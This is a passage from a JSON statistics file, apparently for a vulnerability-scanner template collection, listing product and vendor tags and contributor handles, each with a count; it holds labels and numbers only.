"name":"growi","count":1},{"name":"pghero","count":1},{"name":"lemlist","count":1},{"name":"sphinxsearch","count":1},{"name":"lg","count":1},{"name":"lionwiki","count":1},{"name":"protractor","count":1},{"name":"frigate","count":1},{"name":"plone","count":1},{"name":"hunter","count":1},{"name":"sonarcloud","count":1},{"name":"user-meta","count":1},{"name":"parse","count":1},{"name":"elloco","count":1},{"name":"daybydaycrm","count":1},{"name":"ghostcms","count":1},{"name":"-","count":1},{"name":"eventon-lite","count":1},{"name":"flowise","count":1},{"name":"stestr","count":1},{"name":"codementor","count":1},{"name":"c99","count":1},{"name":"xmlswf","count":1},{"name":"tbkvision","count":1},{"name":"wprealize","count":1},{"name":"cassianetworks","count":1},{"name":"kasm","count":1},{"name":"castel","count":1},{"name":"wpb-show-core","count":1},{"name":"tmate","count":1},{"name":"quantum","count":1},{"name":"camtron","count":1},{"name":"lorsh-mastodon-instance","count":1},{"name":"ebay-stores","count":1},{"name":"squirrelly","count":1},{"name":"reputeinfosystems","count":1},{"name":"transmission","count":1},{"name":"wp-video-gallery-free","count":1},{"name":"vistaweb","count":1},{"name":"artstation","count":1},{"name":"orbintelligence","count":1},{"name":"acontent","count":1},{"name":"sv3c","count":1},{"name":"infinitewp","count":1},{"name":"dolphinscheduler","count":1},{"name":"protocol","count":1},{"name":"qantumthemes","count":1},{"name":"wd","count":1},{"name":"powerware","count":1},{"name":"cdist","count":1},{"name":"tekton","count":1},{"name":"flowci","count":1},{"name":"api2convert","count":1},{"name":"ups","count":1},{"name":"openwire","count":1},{"name":"quitterpl","count":1},{"name":"block","count":1},{"name":"phpsocialnetwork","count":1},{"name":"wavemaker","count":1},{"name":"scanii","count":1},{"name":"wpruby","count":1},{"name":"litmindclub-mastodon-instance","count":1},{"name":"nexusphp","count":1},{"name":"relevanssi","count":1},{"name":"policja2009","count":1},{"name":"buymeacoffee","count":1},{"name":"crowdin","count":1},{"name":"code-garage","count":1},{"name":"hiring","count":1},{"name":"bonita","count":1},{"name":"cms_tree_page_view_project","count":1},{"name":"lokalise","count":1},{"name":"zuul","count":1},{"name":"pahtool","count":1},{"name":"smartnode","count":1},{"name":"phoronix-media","count":1},{"name":"eap","count":1},{"name":"backupbliss","count":1},{"name":"mailboxvalidator","count":1},{"name":"mindpalette","count":1},{"name":"get-simple.","count":1},{"name":"gunicorn","count":1},{"name":"creatio","count":1},{"name":"autoptimize","count":1},{"name":"gianni_tommasi","count":1},{"name":"bold-themes","count":1},{"name":"alerta_project","count":1},{"name":"mastodon-climatejusticerocks","count":1},{"name":"blade","count":1},{"name":"orcus","count":1},{"name":"meraki","count":1},{"name":"details","count":1},{"name":"brafton","count":1},{"name":"fatcatapps","count":1},{"name":"sexworker","count":1},{"name":"dnssec","count":1},{"name":"airee","count":1},{"name":"untrusted","count":1},{"name":"palnet","count":1},{"name":"inetutils","count":1},{"name":"openbb","count":1},{"name":"katz","count":1},{"name":"razor","count":1},{"name":"geniusocean","count":1},{"name":"livemasterru","count":1},{"name":"loancms","count":1},{"name":"sangoma","count":1},{"name":"tembosocial","count":1},{"name":"ssltls","count":1},{"name":"newgrounds","count":1},{"name":"bitcoin-forum","count":1},{"name":"elasticpot","count":1},{"name":"zwave","count":1},{"name":"thorsten_riess","count":1},{"name":"phpwind","count":1},{"name":"webcraftic","count":1},{"name":"360","count":1},{"name":"lin-cms","count":1},{"name":"text4shell","count":1},{"name":"exchangerateapi","count":1},{"name":"osu","count":1},{"name":"mhsoftware","count":1},{"name":"dqs","count":1},{"name":"klog","count":1},{"name":"dixell","count":1},{"name":"syfadis","count":1},{"name":"acs","count":1},{"name":"resumes-actorsaccess","count":1},{"name":"geddyjs","count":1},{"name":"maianscriptworld","count":1},{"name":"visual-tools","count":1},{"name":"age-verification","count":1},{"name":"hivemanager","count":1},{"name":"gilacms","count":1},{"name":"msmq","count":1},{"name":"1forge","count":1},{"name":"fortiportal","count":1},{"name":"cse_bookstore_project","count":1},{"name":"ajax-random-post_project","count":1},{"name":"tableausoftware","count":1},{"name":"catalogcreater","count":1},{"name":"content-central","count":1},{"name":"lacie","count":1},{"name":"psstaudio","count":1},{"name":"phpok","count":1},{"name":"blogdesignerpack","count":1},{"name":"clockify","count":1},{"name":"binance","count":1},{"name":"musicstore","count":1},{"name":"deadbolt","count":1},{"name":"simple_client_management_system_project","count":1},{"name":"jorani_project","count":1},{"name":"utility","count":1},{"name":"wptaskforce","count":1},{"name":"on-prem","count":1},{"name":"securimage-wp-fixed_project","count":1},{"name":"ultimate-member","count":1},{"name":"defender-security","count":1},{"name":"fuel-cms","count":1},{"name":"dsr250","count":1},{"name":"asanhamayesh","count":1},{"name":"topapplb","count":1},{"name":"alertmanager","count":1},{"name":"animeplanet","count":1},{"name":"martech","count":1},{"name":"youphptube","count":1},{"name":"lanproxy","count":1},{"name":"postnews","count":1},{"name":"wp-fastest-cache","count":1},{"name":"kongregate","count":1},{"name":"easycorp","count":1},{"name":"alchemy","count":1}],"authors":[{"name":"dhiyaneshdk","count":1322},{"name":"daffainfo","count":865},{"name":"dwisiswant0","count":803},{"name":"pussycat0x","count":362},{"name":"ritikchaddha","count":354},{"name":"pikpikcu","count":353},{"name":"pdteam","count":297},{"name":"princechaddha","count":269},{"name":"ricardomaia","count":232},{"name":"geeknik","count":231},{"name":"theamanrawat","count":223},{"name":"r3y3r53","count":200},{"name":"0x_akoko","count":179},{"name":"gy741","count":158},{"name":"righettod","count":149},{"name":"rxerium","count":142},{"name":"sleepingbag945","count":132},{"name":"arafatansari","count":118},{"name":"tess","count":109},{"name":"pdresearch","count":84},{"name":"iamnoooob","count":69},{"name":"idealphase","count":66},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"rootxharsh","count":62},{"name":"akincibor","count":59},{"name":"for3stco1d","count":55},{"name":"philippedelteil","count":53},{"name":"gaurang","count":42},{"name":"edoardottt","count":42},{"name":"johnk3r","count":42},{"name":"c-sh0","count":35},{"name":"j4vaovo","count":35},{"name":"adam crosser","count":31},{"name":"luisfelipe146","count":31},{"name":"ice3man","count":29},{"name":"mastercho","count":29},{"name":"pwnhxl","count":28},{"name":"organiccrap","count":24},{"name":"hardik-solanki","count":24},{"name":"techbrunchfr","count":23},{"name":"ctflearner","count":23},{"name":"harsh","count":23},{"name":"userdehghani","count":22},{"name":"ffffffff0x","count":22},{"name":"parthmalhotra","count":20},{"name":"kazgangap","count":19},{"name":"cckuailong","count":18},{"name":"sullo","count":18},{"name":"lu4nx","count":17},{"name":"bhutch","count":17},{"name":"shaikhyaser","count":16},{"name":"0xpugazh","count":16},{"name":"random-robbie","count":16},{"name":"unapibageek","count":15},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"tenbird","count":14},{"name":"milo2012","count":14},{"name":"dogasantos","count":14},{"name":"r3dg33k","count":14},{"name":"nullfuzz","count":13},{"name":"0ri2n","count":13},{"name":"sharath","count":13},{"name":"elsfa7110","count":13},{"name":"theabhinavgaur","count":13},{"name":"melbadry9","count":13},{"name":"suman_kar","count":12},{"name":"kazet","count":12},{"name":"meme-lord","count":12},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"co5mos","count":10},{"name":"logicalhunter","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":10},{"name":"random_robbie","count":10},{"name":"0x240x23elu","count":10},{"name":"alph4byt3","count":10},{"name":"adamcrosser","count":9},{"name":"momika233","count":9},{"name":"olearycrew","count":9},{"name":"fabaff","count":9},{"name":"oppsec","count":9},{"name":"initstring","count":9},{"name":"emadshanab","count":9},{"name":"irshad ahamed","count":8},{"name":"noraj","count":8},{"name":"veshraj","count":8},{"name":"iamthefrogy","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"_0xf4n9x_","count":8},{"name":"caspergn","count":7},{"name":"dr_set","count":7},{"name":"its0x08","count":7},{"name":"divya_mudgal","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"nodauf","count":7},{"name":"amit-jd","count":7},{"name":"randomstr1ng","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"huta0","count":7},{"name":"harshbothra_","count":7},{"name":"tarunkoyalwar","count":7},{"name":"leovalcante","count":7},{"name":"ja1sh","count":6},{"name":"puzzlepeaches","count":6},{"name":"gitlab red team","count":6},{"name":"__fazal","count":6},{"name":"megamansec","count":6},{"name":"lucky0x0d","count":6},{"name":"forgedhallpass","count":6},{"name":"clem9669","count":6},{"name":"justaacat","count":6},{"name":"hahwul","count":6},{"name":"pathtaga","count":6},{"name":"devang-solanki","count":6},{"name":"evan rubinstein","count":6},{"name":"imnightmaree","count":6},{"name":"pentest_swissky","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"byt3bl33d3r","count":6},{"name":"xelkomy","count":6},{"name":"mr-xn","count":5},{"name":"r12w4n","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"s0obi","count":5},{"name":"defr0ggy","count":5},{"name":"gtrrnr","count":5},{"name":"vicrack","count":5},{"name":"your3cho","count":5},{"name":"podalirius","count":5},{"name":"r3naissance","count":5},{"name":"prajiteshsingh","count":5},{"name":"shine","count":5},{"name":"powerexploit","count":5},{"name":"pulsesecurity.co.nz","count":5},{"name":"kh4sh3i","count":5},{"name":"robotshell","count":5},{"name":"arm!tage","count":5},{"name":"andreluna","count":5},{"name":"joanbono","count":5},{"name":"panch0r3d","count":5},{"name":"e_schultze_","count":4},{"name":"dadevel","count":4},{"name":"k0pak4","count":4},{"name":"0xr2r","count":4},{"name":"3th1c_yuk1","count":4},{"name":"m4lwhere","count":4},{"name":"ggranjus","count":4},{"name":"wisnupramoedya","count":4},{"name":"tanq16","count":4},{"name":"shankar acharya","count":4},{"name":"king-alexander","count":4},{"name":"cookiehanhoan","count":4},{"name":"jpg0mez","count":4},{"name":"h1ei1","count":4},{"name":"iamnooob","count":4},{"name":"nybble04","count":4},{"name":"heeress","count":4},{"name":"flx","count":4},{"name":"scent2d","count":4},{"name":"xxcdd","count":4},{"name":"ice3man543","count":4},{"name":"incogbyte","count":4},{"name":"dolev farhi","count":4},{"name":"lum8rjack","count":4},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"taielab","count":3},{"name":"aringo","count":3},{"name":"lark-lab","count":3},{"name":"coldfish","count":3},{"name":"andydoering","count":3},{"name":"sushantkamble","count":3},{"name":"z3bd","count":3},{"name":"ph33r","count":3},{"name":"jarijaas","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"ekrause","count":3},{"name":"johnjhacking","count":3},{"name":"canberbamber","count":3},{"name":"cheesymoon","count":3},{"name":"j3ssie","count":3},{"name":"imjust0","count":3},{"name":"fyoorer","count":3},{"name":"parth","count":3},{"name":"e1a","count":3},{"name":"xianke","count":3},{"name":"swissky","count":3},{"name":"badboycxcc","count":3},{"name":"me9187","count":3},{"name":"vagnerd","count":3},{"name":"evergreencartoons","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"whoever","count":3},{"name":"dudez","count":3},{"name":"farish","count":3},{"name":"f1tz","count":3},{"name":"huowuzhao","count":3},{"name":"unstabl3","count":3},{"name":"true13","count":3},{"name":"alifathi-h1","count":3},{"name":"fxploit","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dr0pd34d","count":3},{"name":"c4sper0","count":3},{"name":"bernardofsr","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"matt galligan","count":3},{"name":"splint3r7","count":3},{"name":"binaryfigments","count":3},{"name":"salts","count":3},{"name":"lucasljm2001","count":3},{"name":"_generic_human_","count":3},{"name":"atomiczsec","count":3},{"name":"isacaya","count":3},{"name":"randomrobbie","count":3},{"name":"vsh00t","count":3},{"name":"arcc","count":3},{"name":"0w4ys","count":3},{"name":"davidmckennirey","count":3},{"name":"omranisecurity","count":3},{"name":"securityforeveryone","count":3},{"name":"ambassify","count":3},{"name":"0xrudra","count":2},{"name":"brenocss","count":2},{"name":"rafaelwdornelas","count":2},{"name":"manas_harsh","count":2},{"name":"streetofhackerr007","count":2},{"name":"kishore-hariram","count":2},{"name":"florianmaak","count":2},{"name":"clarkvoss","count":2},{"name":"danmcinerney","count":2},{"name":"herry","count":2},{"name":"ajaysenr","count":2},{"name":"dogancanbakir","count":2},{"name":"t3l3machus","count":2},{"name":"thabisocn","count":2},{"name":"convisoappsec","count":2},{"name":"raesene","count":2},{"name":"korteke","count":2},{"name":"y4er","count":2},{"name":"bing0o","count":2},{"name":"sascha brendel","count":2},{"name":"bananabr","count":2},{"name":"0xsapra","count":2},{"name":"v0idc0de","count":2},{"name":"ep1csage","count":2},{"name":"amirhossein raeisi","count":2},{"name":"thevillagehacker","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"topscoder","count":2},{"name":"amsda","count":2},{"name":"h0j3n","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"geekby","count":2},{"name":"hetroublemakr","count":2},{"name":"bp0lr","count":2},{"name":"bmcel","count":2},{"name":"c3l3si4n","count":2},{"name":"usdag","count":2},{"name":"arliya","count":2},{"name":"charles d","count":2},{"name":"0xcrypto","count":2},{"name":"d4vy","count":2},{"name":"nuk3s3c","count":2},{"name":"w4cky_","count":2},{"name":"redteambrasil","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"ree4pwn","count":2},{"name":"charles d.","count":2},{"name":"udit_thakkur","count":2},{"name":"mohammedsaneem","count":2},{"name":"socketz","count":2},{"name":"supr4s","count":2},{"name":"6mile","count":2},{"name":"thezakman","count":2},{"name":"supras","count":2},{"name":"mzack9999","count":2},{"name":"martincodes-de","count":2},{"name":"zomsop82","count":2},{"name":"8arthur","count":2},{"name":"nkxxkn","count":2},{"name":"foulenzer","count":2},{"name":"paperpen","count":2},{"name":"serrapa","count":2},{"name":"ayadim","count":2},{"name":"maximus decimus","count":2},{"name":"joshlarsen","count":2},{"name":"codexlynx","count":2},{"name":"cckuakilong","count":2},{"name":"kiblyn11","count":2},{"name":"paradessia","count":2},{"name":"liwermor","count":2},{"name":"cocxanh","count":2},{"name":"lotusdll","count":2},{"name":"nvn1729","count":2},{"name":"sy3omda","count":2},{"name":"danielmofer","count":2},{"name":"ehsahil","count":2},{"name":"vavkamil","count":2},{"name":"pxmme1337","count":2},{"name":"shelled","count":2},{"name":"dahse89","count":2},{"name":"luci","count":2},{"name":"bsysop","count":2},{"name":"666asd","count":2},{"name":"afaq","count":2},{"name":"x1m_martijn","count":2},{"name":"kre80r","count":2},{"name":"joshua rogers","count":2},{"name":"parzival","count":2},{"name":"zy9ard3","count":2},{"name":"dheerajmadhukar","count":2},{"name":"msegoviag","count":2},{"name":"0xnirvana","count":2},{"name":"mrharshvardhan","count":2},{"name":"hackerarpan","count":2},{"name":"g4l1t0","count":2},{"name":"christianpoeschl","count":2},{"name":"myztique","count":2},{"name":"joeldeleep","count":2},{"name":"notnotnotveg","count":2},{"name":"0xsmiley","count":2},{"name":"wa1tf0rme","count":2},{"name":"n-thumann","count":2},{"name":"koti2","count":2},{"name":"0xelkomy","count":2},{"name":"k11h-de","count":2},{"name":"brucelsone","count":2},{"name":"randomdhiraj","count":2},{"name":"github.com/its0x08","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"davidegirardi","count":2},{"name":"dbrwsky","count":2},{"name":"pbuff07","count":2},{"name":"moritz nentwig","count":2},{"name":"lstatro","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"z0ne","count":2},{"name":"shankaracharya","count":2},{"name":"uomogrande","count":2},{"name":"gevakun","count":2},{"name":"egemenkochisarli","count":2},{"name":"thardt-praetorian","count":2},{"name":"sbani","count":2},{"name":"sinkettu","count":2},{"name":"gal nagli","count":2},{"name":"luqmaan hadia","count":1},{"name":"sanineng","count":1},{"name":"justmumu","count":1},{"name":"eremit4","count":1},{"name":"thebinitghimire","count":1},{"name":"rojanrijal","count":1},{"name":"ohlinge","count":1},{"name":"pratik khalane","count":1},{"name":"dorkerdevil","count":1},{"name":"amirmsafari","count":1},{"name":"ynnirc","count":1},{"name":"exid","count":1},{"name":"mchklt","count":1},{"name":"vinit989","count":1},{"name":"david botelho mariano","count":1},{"name":"retr02332","count":1},{"name":"none","count":1},{"name":"amanrawat","count":1},{"name":"yiran","count":1},{"name":"hanlaomo","count":1},{"name":"pepitoh","count":1},{"name":"becivells","count":1},{"name":"sec_hawk","count":1},{"name":"jbertman","count":1},{"name":"fq_hsu","count":1},{"name":"erethon","count":1},{"name":"ahmetpergamum","count":1},{"name":"mesaglio","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"jacalynli","count":1},{"name":"m0ck3d","count":1},{"name":"jonathanwalker","count":1},{"name":"berkdusunur","count":1},{"name":"xshuden","count":1},{"name":"vzamanillo","count":1},{"name":"0xparth","count":1},{"name":"notwhy","count":1},{"name":"alperenkesk","count":1},{"name":"qlkwej","count":1},{"name":"djoevanka","count":1},{"name":"revblock","count":1},{"name":"carrot2","count":1},{"name":"natto97","count":1},{"name":"shivampand3y","count":1},{"name":"babybash","count":1},{"name":"pudsec","count":1},{"name":"bugvsme","count":1},{"name":"ipanda","count":1},{"name":"kiransau","count":1},{"name":"francescocarlucci","count":1},{"name":"f0xy","count":1},{"name":"elmahdi","count":1},{"name":"compr00t","count":1},{"name":"dievus","count":1},{"name":"jbaines-r7","count":1},{"name":"abbas.heybati","count":1},{"name":"carson chan","count":1},{"name":"husain","count":1},{"name":"bjxsec","count":1},{"name":"tirtha_mandal","count":1},{"name":"sherlocksecurity","count":1},{"name":"phyr3wall","count":1},{"name":"esonhugh","count":1},{"name":"soyelmago","count":1},{"name":"infosecsanyam","count":1},{"name":"realexp3rt","count":1},{"name":"rinolock","count":1},{"name":"shockwave","count":1},{"name":"michal-mikolas","count":1},{"name":"lark lab","count":1},{"name":"palanichamy_perumal","count":1},{"name":"arqsz","count":1},{"name":"mabdullah22","count":1},{"name":"cravaterouge","count":1},{"name":"miryangjung","count":1},{"name":"ldionmarcil","count":1},{"name":"x6263","count":1},{"name":"b4uh0lz","count":1},{"name":"denandz","count":1},{"name":"ayadi","count":1},{"name":"p-l-","count":1},{"name":"daffianfo","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"lixts","count":1},{"name":"kiks7","count":1},{"name":"pphuahua","count":1},{"name":"sospiro","count":1},{"name":"adrianmf","count":1},{"name":"viondexd","count":1},{"name":"regala_","count":1},{"name":"kr1shna4garwal","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"1nf1n7y","count":1},{"name":"ruppde","count":1},{"name":"adnanekhan","count":1},{"name":"dabla","count":1},{"name":"bywalks","count":1},{"name":"kaizensecurity","count":1},{"name":"kresec","count":1},{"name":"juicypotato1","count":1},{"name":"elder tao","count":1},{"name":"lamscun","count":1},{"name":"stupidfish","count":1},{"name":"jfbes","count":1},{"name":"savik","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"sak1","count":1},{"name":"vikas kundu","count":1},{"name":"izn0u","count":1},{"name":"pjborah","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"knassar702","count":1},{"name":"patralos","count":1},{"name":"alexrydzak","count":1},{"name":"zn9988","count":1},{"name":"ndmalc","count":1},{"name":"w0tx","count":1},{"name":"s1r1us","count":1},{"name":"nuts7","count":1},{"name":"screamy","count":1},{"name":"jrolf","count":1},{"name":"ransomsec","count":1},{"name":"icarot","count":1},{"name":"hazana","count":1},{"name":"sorrowx3","count":1},{"name":"igibanez","count":1},{"name":"furkansayim","count":1},{"name":"narluin","count":1},{"name":"caon","count":1},{"name":"ap3r","count":1},{"name":"xc1ym","count":1},{"name":"remonsec","count":1},{"name":"millermedia","count":1},{"name":"duty_1g","count":1},{"name":"sdcampbell","count":1},{"name":"mlec","count":1},{"name":"notsoevilweasel","count":1},{"name":"ramkrishna sawant","count":1},{"name":"sshell","count":1},{"name":"aringo-bf","count":1},{"name":"iphantasmic","count":1},{"name":"0ut0fb4nd","count":1},{"name":"exploitation","count":1},{"name":"josecosta","count":1},{"name":"hotpot","count":1},{"name":"booboohq","count":1},{"name":"rodnt","count":1},{"name":"udinchan","count":1},{"name":"noah @thesubtlety","count":1},{"name":"naglis","count":1},{"name":"aravind","count":1},{"name":"skylark-lab","count":1},{"name":"kareemse1im","count":1},{"name":"colbyjack1134","count":1},{"name":"gonski","count":1},{"name":"metascan","count":1},{"name":"secthebit","count":1},{"name":"lingtren","count":1},{"name":"chesterblue","count":1},{"name":"tehtbl","count":1},{"name":"ritesh_gohil(#l4stpl4y3r)","count":1},{"name":"kabirsuda","count":1},{"name":"wabafet","count":1},{"name":"west-wise","count":1},{"name":"zandros0","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"mrcl0wnlab","count":1},{"name":"pry0cc","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"jaskaran","count":1},{"name":"willd96","count":1},{"name":"dk999","count":1},{"name":"technicaljunkie","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"f1she3","count":1},{"name":"shivanshkhari","count":1},{"name":"th3.d1p4k","count":1},{"name":"amnotacat","count":1},{"name":"af001","count":1},{"name":"retr0","count":1},{"name":"daviey","count":1},{"name":"ahmed abou-ela","count":1},{"name":"hakluke","count":1},{"name":"olewagner","count":1},{"name":"deena","count":1},{"name":"marcos_iaf","count":1},{"name":"jeya seelan","count":1},{"name":"rivalsec","count":1},{"name":"wlayzz","count":1},{"name":"floriandewald","count":1},{"name":"oscarintherocks","count":1},{"name":"jub0bs","count":1},{"name":"co0nan","count":1},{"name":"official_blackhat13","count":1},{"name":"xstp","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"numan türle","count":1},{"name":"thirukrishnan","count":1},{"name":"luciannitescu","count":1},{"name":"invisiblethreat","count":1},{"name":"th3r4id","count":1},{"name":"shreyapohekar","count":1},{"name":"bad5ect0r","count":1},{"name":"pwnwithlove","count":1},{"name":"0xceba","count":1},{"name":"udyz","count":1},{"name":"rschio","count":1},{"name":"r3nz0","count":1},{"name":"akokonunes","count":1},{"name":"brabbit10","count":1},{"name":"elouhi","count":1},{"name":"dhiyanesdk","count":1},{"name":"mihhailsokolov","count":1},{"name":"yusakie","count":1},{"name":"arall","count":1},{"name":"nytr0gen","count":1},{"name":"breno_css","count":1},{"name":"yavolo","count":1},{"name":"apt-mirror","count":1},{"name":"luskabol","count":1},{"name":"dwbzn","count":1},{"name":"omarkurt","count":1},{"name":"osamahamad","count":1},{"name":"gpiechnik2","count":1},{"name":"yuansec","count":1},{"name":"act1on3","count":1},{"name":"_darrenmartyn","count":1},{"name":"jeya.seelan","count":1},{"name":"k3rwin","count":1},{"name":"d0rkerdevil","count":1},{"name":"yaser_s","count":1},{"name":"jcockhren","count":1},{"name":"banana69","count":1},{"name":"aaronchen0","count":1},{"name":"droberson","count":1},{"name":"domenicoveneziano","count":1},{"name":"_harleo","count":1},{"name":"am0nt31r0","count":1},{"name":"win3zz","count":1},{"name":"rubina119","count":1},{"name":"jas37","count":1},{"name":"pdp","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"nerrorsec","count":1},{"name":"adilsoybali","count":1},{"name":"queencitycyber","count":1},{"name":"erikowen","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"dali","count":1},{"name":"qianbenhyu","count":1},{"name":"opencirt","count":1},{"name":"noobexploiter","count":1},{"name":"mantissts","count":1},{"name":"paper-pen","count":1},{"name":"nielsing","count":1},{"name":"lethargynavigator","count":1},{"name":"push4d","count":1},{"name":"jiheon-dev","count":1},{"name":"tim_koopmans","count":1},{"name":"spac3wh1te","count":1},{"name":"arjunchandarana","count":1},{"name":"mr.bobo hp","count":1},{"name":"axrk","count":1},{"name":"ky9oss","count":1},{"name":"2rs3c","count":1},{"name":"harryha","count":1},{"name":"0h1in9e","count":1},{"name":"0xcharan","count":1},{"name":"geraldino2","count":1},{"name":"hlop","count":1},{"name":"gboddin","count":1},{"name":"dale clarke","count":1},{"name":"unknown","count":1},{"name":"dawid-czarnecki","count":1},{"name":"petruknisme","count":1},{"name":"iampritam","count":1},{"name":"pussycat0","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"mubassirpatel","count":1},{"name":"mah3sec_","count":1},{"name":"couskito","count":1},{"name":"higor melgaço","count":1},{"name":"professorabhay","count":1},{"name":"flag007","count":1},{"name":"pascalheidmann","count":1},{"name":"wpsec","count":1},{"name":"sttlr","count":1},{"name":"anonymous","count":1},{"name":"dmartyn","count":1},{"name":"kurohost","count":1},{"name":"adamparsons","count":1},{"name":"intx0x80","count":1},{"name":"ola456","count":1},{"name":"irshadahamed","count":1},{"name":"liquidsec","count":1},{"name":"marcio mendes","count":1},{"name":"ramondunker","count":1},{"name":"apple","count":1},{"name":"0xh7ml","count":1},{"name":"shiva (strobes security)","count":1},{"name":"carlosvieira","count":1},{"name":"ph33rr","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"elitebaz","count":1},{"name":"0xceeb","count":1},{"name":"joaonevess","count":1},{"name":"sw0rk17","count":1},{"name":"0xteles","count":1},{"name":"5up3r541y4n","count":1},{"name":"omarjezi","count":1},{"name":"whynotke","count":1},{"name":"unblvr1","count":1},{"name":"michael wedl","count":1},{"name":"freakyclown","count":1},{"name":"noamrathaus","count":1},{"name":"httpvoid","count":1},{"name":"lady_bug","count":1},{"name":"mhdsamx","count":1},{"name":"puben","count":1},{"name":"luqman","count":1},{"name":"nagli","count":1},{"name":"diablo","count":1},{"name":"arr0way","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"b0yd","count":1},{"name":"y0no","count":1},{"name":"barthy.koeln","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"jadu101","count":1},{"name":"davidfegyver","count":1},{"name":"8authur","count":1},{"name":"akshansh","count":1},{"name":"aron molnar","count":1},{"name":"brianlam38","count":1},{"name":"ahmed sherif","count":1},{"name":"affix","count":1},{"name":"jaimin gondaliya","count":1},{"name":"juliosmelo","count":1},{"name":"hüseyin tintaş","count":1},{"name":"shelld3v","count":1},{"name":"mass0ma","count":1},{"name":"themiddle","count":1},{"name":"r3s ost","count":1},{"name":"fpatrik","count":1},{"name":"high","count":1},{"name":"tangxiaofeng7","count":1},{"name":"aresx","count":1},{"name":"sickwell","count":1},{"name":"zinminphy0","count":1},{"name":"sechunt3r","count":1},{"name":"yashanand155","count":1},{"name":"sicksec","count":1},{"name":"piyushchhiroliya","count":1},{"name":"drfabiocastro","count":1},{"name":"hateshape","count":1},{"name":"b0rn2r00t","count":1},{"name":"_c0wb0y_","count":1},{"name":"nobody","count":1},{"name":"mayank_pandey01","count":1},{"name":"zhenwarx","count":1},{"name":"unkl4b","count":1},{"name":"charanrayudu","count":1},{"name":"tirtha","count":1},{"name":"rotembar","count":1},{"name":"lrtk-coder","count":1},{"name":"undefl0w","count":1},{"name":"godfatherorwa","count":1},{"name":"mariam tariq","count":1},{"name":"majidmc2","count":1},{"name":"abdullahisik","count":1},{"name":"zsusac","count":1},{"name":"aayush vishnoi","count":1},{"name":"micha3lb3n","count":1},{"name":"0xrod","count":1},{"name":"akash.c","count":1},{"name":"open-sec","count":1},{"name":"jteles","count":1},{"name":"mammad_rahimzada","count":1},{"name":"hyunsoo-ds","count":1},{"name":"evolutionsec","count":1},{"name":"hakimkt","count":1},{"name":"byobin","count":1},{"name":"danfaizer","count":1},{"name":"alevsk","count":1},{"name":"aaban solutions","count":1},{"name":"tea","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"shiar","count":1},{"name":"thelicato","count":1},{"name":"phillipo","count":1},{"name":"kailashbohara","count":1},{"name":"chetgan","count":1},{"name":"j33n1k4","count":1},{"name":"makyotox","count":1},{"name":"fur1na","count":1},{"name":"therealtoastycat","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"defektive","count":1},{"name":"ledoubletake","count":1},{"name":"bjhulst","count":1},{"name":"vulnspace","count":1},{"name":"n0el4kls","count":1},{"name":"fopina","count":1},{"name":"furkansenan","count":1},{"name":"calumjelrick","count":1},{"name":"miroslavsotak","count":1},{"name":"archer","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"null_hypothesis","count":1},{"name":"jna1","count":1},{"name":"harshinsecurity","count":1},{"name":"galoget","count":1},{"name":"houdinis","count":1},{"name":"youngpope","count":1},{"name":"mordavid","count":1},{"name":"mukundbhuva","count":1},{"name":"hardik-rathod","count":1},{"name":"viniciuspereiras","count":1},{"name":"rotemreiss","count":1},{"name":"0xkayala","count":1},{"name":"orpheus","count":1},{"name":"ringo","count":1},{"name":"ok_bye_now","count":1},{"name":"xeldax","count":1},{"name":"blckraven","count":1},{"name":"evan 